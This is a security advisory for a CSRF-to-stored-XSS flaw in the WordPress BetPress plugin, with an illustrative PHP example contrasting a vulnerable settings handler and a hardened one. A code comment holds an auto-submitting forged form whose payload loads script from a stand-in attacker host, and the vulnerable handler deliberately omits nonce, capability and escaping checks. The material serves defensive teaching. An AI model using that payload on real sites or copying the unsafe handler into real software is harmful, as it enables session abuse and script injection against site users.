CVE-2025-48309 HIGH

CVE-2025-48309: WordPress BetPress plugin <= 1.0.1 Lite - CSRF to Stored XSS vulnerability

Vendor Web-Able
Product BetPress
Weakness CWE-352 · CSRF
Published August 28, 2025
Last update April 28, 2026

CVSS base score

7.1/10
Attack vector Network
Attack complexity Low
Privileges required None
User interaction Required
Scope Changed
Confidentiality Low
Integrity Low
Availability Low

CVSS vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L

What the vulnerability does

01Description

Cross-Site Request Forgery (CSRF) vulnerability in web-able BetPress (betpress) allows Stored XSS. This issue affects BetPress: from n/a through 1.0.1 Lite, i.e. every release up to and including 1.0.1 Lite; the record lists no fixed release.

Explanation of Vulnerability in Simple Terms

02Summary

BetPress versions up to and including 1.0.1 Lite accept at least one state-changing request without verifying that it was issued from the plugin's own interface (in WordPress terms, typically a missing or unchecked nonce). An attacker, who needs no account on the site, crafts a page or link that silently submits that request; when a logged-in user with the rights to perform the action visits it, the browser attaches the user's session cookies and the action succeeds. Here the forged request writes attacker-controlled content that the plugin stores and later renders without escaping, so the outcome is a stored cross-site scripting payload that executes in the browsers of other visitors. This is why the CVSS vector carries Privileges Required: None, User Interaction: Required and Scope: Changed: a single tricked user is the entry point, but the injected script runs for everyone who views the affected page.

What an attacker can do

03Attacker Capabilities

Submit a state-changing request to the plugin in the name of a logged-in user who is tricked into visiting an attacker-controlled page, and through that request store a script payload that later runs in the browsers of other users of the site.

Potential impact on your site

04Site Impact

Plugin data or settings are changed as the victim user without their knowledge, and a persistent JavaScript payload is served to site visitors, where it runs with the privileges of whoever is viewing the page.

Conditions required to exploit

05Prerequisites

The attacker needs no account on the site. A user who is logged in with enough privileges to perform the forged action must click a malicious link or visit an attacker-controlled page while their session is active.
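The pattern behind a CSRF-to-stored-XSS bug in a WordPress plugin, and the corresponding fix, as an added illustration: this is not BetPress code, and the plugin prefix acme_, the option acme_banner_text, the admin-post action names and the shortcodes are all hypothetical. It assumes it is loaded as a WordPress plugin, so the wp_* and add_* functions are WordPress core. The vulnerable handler trusts the login cookie alone; the hardened version checks a nonce, checks a capability, sanitises on input and escapes on output.

```php
<?php
/**
 * Illustrative CSRF -> stored XSS pattern in a WordPress plugin and its fix.
 * Added example, not BetPress code: prefix "acme_", option "acme_banner_text",
 * the admin-post action names and the shortcodes are hypothetical.
 * Assumes it is loaded as a WordPress plugin (all wp_*/add_* functions are core).
 */

// ---------- Vulnerable pattern ----------
// admin-post.php routes POST ?action=acme_save_banner_vuln here for any
// logged-in user. Nothing ties the request to the plugin's own form, so a page
// the attacker controls can auto-submit it with the victim's session cookies
// (hypothetical hosts):
//
//   <form action="https://victim.example/wp-admin/admin-post.php" method="post">
//     <input name="action" value="acme_save_banner_vuln">
//     <input name="banner_text" value="<script src=//attacker.example/x.js></script>">
//   </form><script>document.forms[0].submit()</script>
//
add_action( 'admin_post_acme_save_banner_vuln', function () {
    // No nonce, no capability check, no sanitisation.
    update_option( 'acme_banner_text', $_POST['banner_text'] ?? '' );
    wp_safe_redirect( admin_url( 'admin.php?page=acme' ) );
    exit;
} );

add_shortcode( 'acme_banner_vuln', function () {
    // Stored payload is echoed raw into every page that uses the shortcode.
    return '<div class="acme-banner">' . get_option( 'acme_banner_text', '' ) . '</div>';
} );

// ---------- Hardened pattern ----------
add_action( 'admin_post_acme_save_banner', 'acme_save_banner' );

function acme_save_banner() {
    // 1. CSRF: die unless the request carries a nonce issued for this action to
    //    this user's session. A forged cross-site form cannot obtain one.
    check_admin_referer( 'acme_save_banner', 'acme_nonce' );

    // 2. Authorisation: "logged in" is not "allowed to change settings".
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( esc_html__( 'You are not allowed to change this setting.', 'acme' ), 403 );
    }

    // 3. Input: strip tags before storing.
    $text = sanitize_text_field( wp_unslash( $_POST['banner_text'] ?? '' ) );
    update_option( 'acme_banner_text', $text );

    wp_safe_redirect( admin_url( 'admin.php?page=acme&updated=1' ) );
    exit;
}

// Settings form: the nonce field is what check_admin_referer() verifies.
function acme_banner_form() {
    ?>
    <form method="post" action="<?php echo esc_url( admin_url( 'admin-post.php' ) ); ?>">
        <input type="hidden" name="action" value="acme_save_banner">
        <?php wp_nonce_field( 'acme_save_banner', 'acme_nonce' ); ?>
        <input type="text" name="banner_text"
               value="<?php echo esc_attr( get_option( 'acme_banner_text', '' ) ); ?>">
        <?php submit_button( __( 'Save banner', 'acme' ) ); ?>
    </form>
    <?php
}

add_shortcode( 'acme_banner', function () {
    // 4. Output: escape at render time, so even a value that slipped past
    //    input filtering (older data, direct DB edit) cannot execute.
    return '<div class="acme-banner">' . esc_html( get_option( 'acme_banner_text', '' ) ) . '</div>';
} );
```

A quick check of any installed plugin for the same pattern: list its admin_post_* and wp_ajax_* handlers and confirm each one calls check_admin_referer() or wp_verify_nonce() and current_user_can() before it touches update_option(), the database or the filesystem, and that every stored value is passed through esc_html(), esc_attr() or wp_kses_post() where it is rendered.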

Key dates

06Disclosure timeline

August 28, 2025 CVE published
April 28, 2026 Record updated